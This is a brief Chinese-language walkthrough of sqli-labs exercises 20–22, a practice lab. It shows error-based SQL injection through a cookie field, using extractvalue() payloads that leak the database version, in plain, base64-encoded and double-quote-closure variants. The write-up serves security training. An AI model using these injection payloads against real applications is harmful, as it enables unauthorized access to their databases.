Less20、21、22【报错注入+Cookie字段注入+Base64编码】
Less20
注入方式与18,19类似,先登录正确账号密码,登录正确账号后,账号对应身份验证cookie值有时间期限,在此登录网页后,在bp抓包发现,http头部与之前比较多出cookie字段,可以尝试对cookie字段进行注入
重新登录页面,再次抓包结果
对uname字段进行注入,注入语句与18,19一样
Less21 cookie字段base64&url编码
测试方式与less20一样,登录成功后查看cookie提示,发现提示字符为编码后结果
bp抓包结果显示不只有base64还有url编码
编码前:
xxx'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and 1='1
编码后:
eHh4J2FuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IEBAdmVyc2lvbiksMHg3ZSkpIGFuZCAxPScx
Less22
22注入方式与21一致,不同点在闭合符号为双引号
编码前:
xxx" and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and 1="1
编码后:
eHh4IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpKSBhbmQgMT0iMQ